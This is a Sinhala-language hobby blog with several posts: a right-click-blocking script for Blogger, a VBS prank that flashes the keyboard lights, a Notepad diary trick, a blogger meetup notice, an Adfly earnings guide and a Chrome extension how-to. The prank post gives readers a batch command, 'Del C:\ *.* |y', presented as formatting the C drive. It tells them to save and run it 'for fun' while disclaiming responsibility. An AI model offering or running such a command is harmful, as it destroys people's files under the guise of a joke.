අපිට කරන්න පුළුවන් මේ වගේ දෙයක් .තමා .... හරි හරි ඇති .. මම ආපු වැඩේ කියන්නම් ... එකත් මේ සම්බන්දව තමා .. මේක ඇත්තටම මට හම්බ උනේ මමත් මේ ගැන හොයද්දි ... ඒත් මේකත් එච්චරම සාර්ථක ක්‍රමයක් නෙවේ ... ඒත් මේකෙන් යම්තාක් දුරකට හරි ඔය හොරුන්ගෙන් ඔයාගේ බ්ලොග් එක බෙර ගන්න පුළුවන් උනොත් එක ලොකු දෙයක් නේද ... මම කියන්නම් මුල ඉදන් .. මේක Java script එකක් ... මේක ඔයාගේ බ්ලොග් එකට දාපුවාම වෙන්නේ .. ඔයාගේ බ්ලොග් එකට එන අයගේ මවුස් එකේ දකුණු පැත්තේ බොත්තම වැඩ නැතුව යන එක ... කොටින්ම කියනවනම් Right Click වෙන්නේ නැහැ .. ඒ උනාට මේක ඔයාගේ බ්ලොග් එක ඇතුලෙදි විතරයි ඇ .. ඒ කියන්නේ Right Click කරලා කොපි කරන යට ඔයාගේ බ්ලොග් පෝස්ට් කොපි කරන්න බැරුව යනවා ... ඔයාලට මේක කරලා බලන්න  කලින් මගේ Demo  බ්ලොග් එකට ගිහින් නිකන් ආසාවට Right Click කරලා බලන්න ක්ලික් වෙනවද කියල .. :v

-->  හරි කතා ඇති .. මම වැඩේ කරන හැටි කියන්නම් ... මුලින්ම ඔයා ඔයාගේ Blogger එකවුන්ට් එකට ලොග් වෙන්න .. ඊට පස්සේ බ්ලොග් එකේ Layout යන්න ... හරි නේද ..

-->  දැන් ඔයා කොහේ හරි Add a gadget ක්ලික් කරලා Html/Java Script ඇඩ් කරන එකක් අරගෙන මම පහලින් දීල තියෙන කෝඩ් එක එකේ කොපි කරන්න ... මාතෘකා දාන්න එපා .. දැන් save කරන්න ...

මෙන්න කෝඩ් එක !

<script language="JavaScript">
<!--
var message="";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}
document.oncontextmenu=new Function("return false")
// -->
</script>

හරි .. දැන් ඔයා ඔයාගේ බ්ලොග් එකට ගිහින් බලන්න Right Click කරන්න පුලුවන්ද කියල .. දැන් ඉතින් ඔයාගේ බ්ලොග් එකෙන් ඔයාටවත් Right Click > copy කරන්න බැහැ ... මේ එක දෙයක් විතරයි .. තව දේවල් තියෙනවා ..ඒවා ගැන තව හොයල පස්සේ ඔයාටත් දන ගන්න ...ලියන්නම් ... ඔයාට පුලුවන්නම් ඔයාගේ බ්ලොග් එකේ දාන පින්තුර වලට Water Mark එකක් එහෙම දාන්න .. එතකොටත් කොපි කරන අයට ටිකක් අමාරු වෙයි .. මම බොළඳ වැඩිද ... කමක් නැහැ .. එහෙනම් මම ගියා ...කොමෙන්ට් එකක් එහෙමත් දාල .යන්න ... ඔයාගේ  යාලුවන්ටත් මේ ගැන දන ගන්න Facebook ෂෙයාර් පාරක් එහෙමත් දාන්න .... ආයිත් එන්නම් ... ටටා ...

එතකන්...

 ජය වේවා ... !!!!
හායි හායි යාලුවනේ .. කොහොමද ඔයාලට ඇ .. .. හි හි .. හරි හරි .. .. අද මම ඔයාලට පොඩි ආතල් සීන් ටිකක් කියල දෙන්නයි ආවේ .. සමහර අයනම් මේවා දන්නවත් ඇති .. මම මේ කියල දෙන්නේ දන්නේ නැති අයටලු ඇ .. :D   .. හැක හැක .. මේක ආතල් එකට හදන වයිරස් එකක් කියල හිතා ගන්නකො .. එතකොට හිතට මොරාල් .. :3  

එකටම කියල දෙන්නම්  ඔයාගේ Keyboard එකේ තියෙන ලයිට් තුන පිස්සු වට්ටන විදියක් .. ඔව් අනී .. නටනවා කුඩු වෙන්න .. :P

-->  හිකි .. ඔයා මුලින්ම Notepad එකක් open කර ගන්නකො .. 

-->  ඊට පස්සේ ඔයා එකේ මම  පහල දීල තියෙන Code එක එකේ කොපි කරගන්න පොඩ්ඩක්වත් වරද්දන්නෙ නැතුව .. :D 

Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop - See more at: http://www.coolhackingtrick.com/2013/01/top-5-cool-notepad-tricks.html#sthash.KeJZrcYz.dpuf

-->  ඊට පස්සේ එක ඔයාට කැමති නමකින් File Format එක .vbs කියල save කලන්න .. ආ මතක ඇතිව All files දීල save කලන්න ඇ .. 




-->  හරිද ඇ .. එහෙනම් දැන් ඔයා එක save කරපු එක open කරලා බලන්නකෝ .. මොකක්ද බලන්නේ ... ඔව් ඔව් . keyboard එකේ ලයිට් ටික බලන්න .. :P ..ආතල් නේද ඇ .. 


එහෙනම් ඊලගට දිනපොතක් හදා ගන්න හැටි කීල දෙන්නද ..

-->  මෙහෙමයි .. මුලින්ම ඔයා Notepad එකක් ඕපන් කලාගෙන එකේ උඩින්ම " .LOG කියල ටයිප් කලන්න .. ( කැපිටල් වලින් )

-->  දැන් එක ඕනි තැනක save කලන්න කැමති නමකින් txt file එකක් විදියට .. දැන් එකේ ඔයා ටයිප් කරලා save කලන ඕනි එකක් ටයිප් කලපු දිනෙයි වෙලාවයි එක්කම පෙන්නනවා .. ඇ ..
හොදයි නේද .. :D 


ඊලග එක බයානකයි බබා ...

ඕනිනම් කරන්න .. C එක Format කිරීම කියල මාතෘකාවට දා ගන්නකො ..





-->  එහෙනම් ඔයා Notepad එකක් open කරලා මම පහල දීල තියෙන කෝඩ් එක කොපි පේස්ට් කරලා  කැමති නමකින් .bat file එකක් විදියට save කරන්න . මතක  ඇතුව all file දාල save කරන්න ඈ .. 


@Echo off Del C:\ *.* |y

-->  හරි ඊට පස්සේ එක run කරලා ..බලන්නකෝ ... හැබැයි මම වගකියනු නොලැබේ ඇ .. 


එහෙනම් පොඩි ආතල් එකක් හරි එකෙන් ගත්තනම් මට ඒ ඇති .. මමත් ගිහින් එන්නම් ... තව පොඩි පොඩි ට්‍රික් වගයක් තියෙනෙව .. ඒවා දැන් කියන්න  කම්මැලියි අනී .. පස්සේ පොස්ටුවකින් කියන්නම් .. 
 හෝව් හෝව් .. නිකන්ම යන්නෙපා ඇ .. මේක ඔයාගේ යාලුවන්ටත් බලන්න Share පාරක්  එහෙම දාන්න .. කොමෙන්ටුවක් එහෙමත් කොටලා යන්න ඇ .. 

එහෙනම් ටටා බායි ඇ .. 

ජය වේවා ... !!!
වරෙන් යන්න අපිත් එක්ක ..
කන්න බොන්න හිනා වෙන්න ..
බයිලා නැත්නම් හිපොප් කියන්නම් ඔලුවෙන් හිටගෙනම ... :P

ඇ ... මොකක්ද යකු මේ හරුපේ .. මේක බජව් දාන ප්ලේස් එකක්ද .. :3 .. ??

ඇ .. නැහැ නැහැ ..  මේක ඇවිත් ආතල් එකක් .. හැක හැක ..පාර්ටි   එකක් ..

මේක ඇවිත් යකු අපේ කස්ටිය සෙට් වෙන ලංකාවේ අපේ බ්ලොග්කව්රුවන්ගේ සංසදය මගින් පවත්වන වාර්ෂික ගෙට්ටුව .. ( Get together ) ... හැක හැක ..

එතකොට Blog ලියන එවුන්ට විතරද .. ??? :/

නැහැ නැහැ මචං මචී .. බ්ලොග් ලියන කියවන හැමෝටම .. ඕනි එකෙක්ට .. ගන්න ඇදුමක් .. ගන්න පනිට්ටුවක් .. ගන්න 350 ක් .. එන්න දෙසැම්බර් 21 ..

පනිට්ටුව ඇතුලට නාන්න කලිසමකුත් දා ගන්න ඇ .. ;)

මුහුදු වැල්ලේ ආතල් එකක් ගන්න ..  පාට කරපු වතුර එහෙම බොන්න ... ( වතුර ) .. :3 ..
ලාවට ලාවට සින්දුවක් කියල පොඩි කයියක් දාල බුකියේ යාළුවො ඇත්තටම හම්බ වෙන්න .. එනවා නේද ..  හැ .. කුප්ප වැඩ වැහි වහින මේ සැන්ද ව .. උදේ අටේ ඉදන් හවස හතර වෙනකන් .. ඉවරද .. හතරින් පස්සේ ගිනි මැල සංදර්ශනයකුත් තියෙනෙව සහෝ .. ;)  

පාර්ටි එක තියෙන්නේ ගල්කිස්ස JO JO  ප්ලේස් හොටෙල් එකේ .. 





ක්‍රීඩා ගොඩක් .. ෆුල් ෆේස් හෙල්මට් දාගෙන වැලි කෑම ඇතුළු ගොඩක් දේවල් එදාට .. හොද හොද සෙල්ලම් රෑ වෙන ජාමෙට ඇ .. ;)   

අහ එහෙනම් එනවනේ උයා .. එහෙනම්  මෙන්න මේ ෆෝම් එක   පුරෝලා ඔයා එනවා කියල අපිට හරියටම කියන්න ඇ ..

මේ පාර්ටි එකේ ෆේස්බුක් Event එකට මෙතනින්  ගිහින් පාර්ටි එකට කලින් ආතල් ගන්න .. :D

මම කිව්වා ඇති වගේ නේ .. වැඩි විස්තර මෙතැනින්  ගිහින් බලන්නකෝ ..

මම තමා මෙතන ඉන්න පොඩිම එකා .. වයස 15 නංගිලා ඉන්නවනම් එක්කන් එන්න ... මට කම්මැලියිනෙ .. ;) ..




මම බලා ගන්නම් . ආ එදාට ආවම  පොඩි අහිංසක පාට කොන්දේ තට්ටේ ගාපු ලාමක කොල්ලෙක් හම්බු උනොත් ඒ මම නෙවෙයි ඇ .. :P .. ඇවිත් කතා කලන්න ... 

එහෙනම් අනිවා එනවා නේද .. මමත් එනවා .. ඔයත් එන්න ඇ .. එතකන් ටටා .. 
හායි මතන්ල ...මතීල ... කොහොමද ඇ ... සතුටින් සැපෙන් සොම්නසින් ඉන්නවා නේද ආ .. ;) .. මමනම් ඔය කිව්ව විදියට වෙසෙමි ... :D .. හැ .. පොඩි දුකකුත් තියෙනෙව .. එක මම පස්සේ කියන්නම් ඇ ... -_- .. එහෙනම් අද මොකක්ද මේ කියන්න යන්නේ කියල බලමුද .. ඉන්න මම කියන්නම් ... මම අද ඔයාලට කියන්න යන්නේ වෙනස්ම කතාවක් .. වාසනාවට ඇත්ත කතාවක් ... ^_^ :P ... මේක තමා මේ සම්බන්දව මගේ බ්ලොග් එකේ පලවෙන පළමු ලිපිය ... සමහර විට අවසාන එකත් වෙන්න පුළුවන් .. මම හෙට මළොත් .. :/ .. ඔයාලට මේකේ මාතෘකාව දැක්කම ටිකක් ආස හිතෙන්න ඇති නේද .. ඉන්නකෝ මම පටන් ගන්නම් ..

මේ ඔන්ලයින් මනි ..නැත්නම් සිංහලෙන් කියනවනම් අන්තර්ජාලයෙන් මුදල් සෙවීම් අද ලංකාවේ ගොඩක් දුරට පැතිරිලා තියෙනෙවා .. දන්නවද ..ලෝකේ තමන්ගේ රස්සාව විදියට මේක කරන අයත් ඉන්නවා .. මම අද ඔයාලට කියල දෙන්නේ මේ අන්තරජාලෙන් මුදල් හොයන එක ක්‍රමයක් විතරයි .. එක concept එකක් ..

එතකොට මේ Adfly කියන්නේ මොකක්ද ..???  කියන්නම්  ..එක එක web site එකක් ... මෙහෙම හිතන්නකෝ ... ඔයා මොකක් හරි ලින්ක් එකක් තියෙනෙව යාලුවෙක්ට යවන්න ... ඒ ලින්ක් එක පට්ටම දිගයි ..දැක්කම වමනේ .යනවා ...ලින්ක් එකට යන්න හිතෙන්නෙත් නැහැ ..අනන එහෙම වෙලාවට ඔයාට පුළුවන් මේ adfly මගින් ඔයාගේ ලින්ක් එක කෙටි කරගන්න ... හැබැයි අර මුලින් දීපු ලින්ක් එකටමයි යන්නේ ... ඔයා අන්න එහෙම අනිත් අයට කෙටි කරලා දෙන ලින්ක් වලින්  එයාල ගියාම ඒ ලින්ක් එකට යන්න කලින් Adfly එකේ add එකක් යනවා ...එක skip කරලා තමා අපේ original ලින්ක් එකට යන්න පුළුවන් ... හැබැයි අන්න ඒ adfly එකේ add එකක් අනිත් ය බලනවට ඔයාට ගානක් Adfly එකෙන් දෙනවා ... ඔව්.. සල්ලි ... ඇමරිකන් ඩොලර් ... :3 ..ආසද ????

හැබැයි ඔක්කොටම කලින් ඔයා මේකේ එකවුන්ට් එකක් හදාගන්න ඕනි ..  මතක තියා ගන්න ...කවදාවත් බොරු විස්තර දෙන්න එආ ..ඇත්ත නම් ගම දෙන්න ... :D ... හරි මම කියල දෙන්නම් කොහොමද එකවුන්ට් එකක් හදා ගන්නේ කියල ... :D

-->  මුලින්ම ඔයා ඒ සයිට් එකට මෙතනින් යන්නකෝ ...

-->  ඊට පස්සේ එනවා නේද ඔය පහල තියෙනෙව වගේ page එකක් ... ( add එක skip කලන්න )... හරිනේ ..එකේ තියෙන ඔය Join Now කියන බටන් එක ඔබන්න ..



-->  දැන් එනවා නේද ඔය මම දාල තියෙනෙව වගේ ෆෝම් එකක් පුරවන්න ,... දැන් අන්න එකත් හරියටම ඇත්ත විස්ත‍ර දාල පුරෝලා ඔය කොටු කරලා තියෙන තැනට හරි කෑල්ලත් දාල යට තියෙන බොත්තම ඔබන්න ..




-->   දැන් ඔයාට email එකක් ඇවිත් ඇති adfly එකෙන් ... inbox එකේ නැත්නම් පොඩ්ඩක් spam ලිස්ට් එකේ බලන්න ..

-->   අන්න ඒ email එකේ ලින්ක් එකක් එක්ක කෝඩ් එකක් ඇති ..ඒ ලින්ක් එකට යන්නකෝ ..එතකොට අහනවා නේද කෝඩ් එකක් ..අර email එකෙන් එවල තියෙන කෝඩ් එක එතනට කොපි කරනන ... ඊට පස්සේ confirm regiteration දෙන්න .. :) හරිනේ ..දැන් ආයිත් ඔය සයිට් එකට ගිහින් ඔයා කලින් දුන්න email & password දාල ලොග් වෙන්න .. හරිනේද ...


-->   හරිනේ ...බලන්න ලොග් උනාම ඔය මම පහලින් දාල තියෙනෙව වගේ පේනවද කියල ... ඔව් නේද.. හරි ..ඔය මම රතු පාටින් කොටු කරලා තියෙන තැනට ඔයාගේ දිග ලින්ක් එක කොපි කරලා ඔය Shrink කියන බටන් එක ක්ලික් කරන්න .. එතකොට ඔයාට ඒ ලින්ක් එක වෙනුවට සුටීම සුටි හුරුබුහුටි ලින්කුවක් හම්බ වෙයි .. එක ඔයා ඔයාගේ යාලුවන්ට ..නැත්නම් ඔයාගේ Blog එකේ .දාන්න ..එතකොට ඒවගෙන් කට්ටිය ගියාම ඔයාට සල්ලි ලැබෙයි නිකන්ම ...ඔය මම කොළ පාටින් කොටු කරලා තියෙන තැන වටෙනේව ඔයාගේ ලින්ක් එකෙන් කී දෙනෙක් ගිහින් තියෙනෙවද කියල ... නිල පාටට කොටු කරලා තියෙන තැන වැටෙයි ඔයාගේ මුදල් ප්‍රමාණය ... එතන ඩොලර් 5 පිරුණම ඔයාට සල්ලි ගන්න පුළුවන් ..




-->   ඔයාට සල්ලි ගන්න පුලවන් වෙන්නේ Paypal  සහ Payoneer වගේ ඒවාට තමා ..ඒවා ගැන ටිකක් හොයා ගන්න ..ඇ  ඔක්කොම නිකන් දෙන්න බැහැනේ .. ;) ..අහ තව එකක් ..ඔයාගේ Profile එක සම්පුර්ණ කරන්න . එකට ඔය ඔයාගේ මුණක් වැටිලා තියන එක ගාව තියෙන Account කියන එක ක්ලික් කරලා කරන්න පුළුවන් ... ඔයා එක සම්පුර්ණ කලේ නැත්නම් ඔයාට සල්ලි ගන්න බැහැ ..එහෙනම් ඔන්න මම මුලික ටික කියා දුන්න ..මේකෙත් referell එහෙම ගන්න පුළුවන් .. එව්වත් හොයා බලන්නකෝ ...

එහෙනම් අදට මම ගිහින් එන්නම් ඇ .. ඔයාට මේ පෝස්ට් එකෙන් ප්‍රයෝජනයක් උනානම් ඔයාගේ අදහස කොමෙන්ට් කරලා යන්න .. ඔයාගේ යාලුවන්ටත් මේ ගැන කියන්න මේක facebook එකේ එහෙම share පාරක් දාන්න ... ආයිත් එන්නම මේ වගේ පෝස්ට් එකින් .. වෙන කොහොම එන්නද මන් ...


එතකන් ජය වේවා ...!!! 
හායි කට්ටියටම .. කොහොමද ඉතින් ඇ .. මමනම් සැප සේ වෙසෙමි ... හරි .. මම අද ආවේ ටිකක් පරණ .. ඒ උනාට වැඩිය කවුරුත් දන්නේ නැති ගැජමැටික් එකක් ගැන විස්තර අරගෙන ... මේක ඇත්තටම කියනවනම් Back to top බටන් එකක් .. ඇ .. ඒ කියන්නේ .. ඔයා මොකක් හරි සයිට් එකක පහලට පහලට කියවගෙන ගියාම ඔයාට ආයිත් එක ක්ලික් එකකින් සයිට් එකේ උඩටම එන්න පුළුවන් ක්‍රමයක් ... දැන්නම් ගොඩක් Blog  වල මේක තියෙනෙව .. මම බ්ලොග් එකකට මේක දාගන්නේ කොහොමද  කියල මීට කලින් ලිපියකදී ඔයාලට කියල දුන්න මතක ඇති .. එක බලන්න ඕනිනම් මෙතනින්   යන්නකෝ ... අරිනේ .. ඇ ,..

අද මම ඔයාලට කියල දෙන්නේ මේක සන්බන්ද වෙන දෙයක් .. දැන් තියෙන ප්‍රශ්නේ මේක ඔය මම කලින් කිව්වා ගැජට් එක දාල නැති සයිට් වලට අපි ගියාම අපිට ඔය ෆැසිලිටි නැති එකනේ .. එකට විසදුමක් අරගෙන තමා මම මේ පෝස්ට් එක ලියන්නේ .. ඒක ගැන ඔයාලටත් කියන්න ... මුලින්ම කියන්නම් .. මේක පාවිච්ච් කරන්න පුළුවන් .. Google Chrome Use කරන යට විතරයි ... ඔව් .. මේක ක්‍රෝම් වලට එන extension එකක් ..

මේකේ නම Scroll to Top ... ඔව් ... ඔයාලට මේක සාමාන්‍ය extension එකක් add කරගන්න විදියටම add කර ගන්න පුළුවන් .. එතකොට ඔයාල මොන සයිට් එකට ගියත් ඔයාගේ බ්‍රවුසර් එකේ ඔයා සෙටින්ස් වලින් සෙට් කරන තැන පොඩි Icon එකක් වැටෙයි .. අන්න එක ක්ලික් කරාම ඔයාව ඉන්න සයිට් එකේ උඩටම යයි ..

එහෙනම් දන්නා කට්ටිය add .කරගන්නකො . මම දන්නේ නැති යට කියල දෙන්නම් ..  .හරිද .. .. ඔයා මුලින්ම මෙන්න මතැනින්  යන්නකෝ .. හරිද ..

-->  ඊට පස්සේ එනවා නේද page එකක් ..අන්න එකේ දකුණු පැත්තේ උඩ ඇති Free කියල බටන් එකක් ..ඔයා අන්න එක ක්ලික් කරන්න .. ඊට පස්සේ ඔයාගෙන් අහයි මේක Chrome වලට add කරන්නද එපාද කියල .. ඔය මම පහල දාල තීන පුතෝ එකේ වගේ ..අන්න එකට Add කියල දෙන්න .. ඊට පස්සේ එක නිකන්ම download වෙලා chrome වලට ඉබේම add වෙයි ... :D




--> එක add වුනාට පස්සේ ඔයාගේ බ්‍රවුසර් එකේ අලුත් tab එකක් open වෙයි .. එකේ තියෙන්නේ ඔයා දාපු extension එකේ යට ඔයා කැමතිනම් කීයක් හරි දෙන්න ... දෙනවනම් දෙන්න .. :v ... නැත්නම් ඒ tab එක ක්ලෝස් කරන්න ..

හරිනේ .. දැන් ඔයාට තියෙන්නේ ඔය scroll to top බටන් එකේ ඔයාට ඕනි විදියට settings හදා ගන්න එක .. :D 

-->   එක කරන්නේ මෙහෙමයි ... ඔයා ඔයාගේ extensions manage කරන තැනට ...යන්න ... address  bar එකේ මෙන්න මෙහෙම ටයිප් කරන්න .. කොමා නැතුව .. "chrome://extensions"...එතන ඇති ඔය මම පහල දාල තියෙන පුතෝ එකේ වගේ එකක් ...අන්න එක ගාව ඇති ඔය රතු පාටට කොටු කරලා තියෙනෙව වගේ option කියල එකක් ..අන්න එක ක්ලික් කරන්න ... 



-->   එතකොට මෙන්න මේ වගේ එකක් එයි ...



-->   එතනින් ඔයාට කැමති විදියට settings හදා ගන්න පුළුවන් .. ඉතුරු ටික ඔයාට බාරයි .


එහෙනම් ඉතින් මම ටුකුස් .. ඔයාට මේ පෝස්ට් එකෙන් ප්‍රයෝජනයක් උනා වගේ තේරුනොත් කොමෙන්ට් එකක් එහෙම දාල යන්න .. මතක ඇතුව අපේ FB fan page එකටත් ලයික් එකක් දාන්ට ඇ ..යාලුවන්ට බලන්න share කරන්න .. ඕවගෙන් අඩුම තරමේ එකක් හරි කරන්න .. එහෙනම් පරිස්සමින් ඉන්න .. අයි එනකම් 

ජය වේවා ... !!!
සාදරයෙන් පිළිගන්නවා !

ලිපි ගොනුව !

මාත් එක්ක ඉන්න සෙට් එක !

Translate

- Copyright © චකබ්ලාස්ට් ගේ ලෝකය ! - මේකේ ඔක්කොම වැඩ ටික කලේචකස් මල්ලි

වසා දමන්න !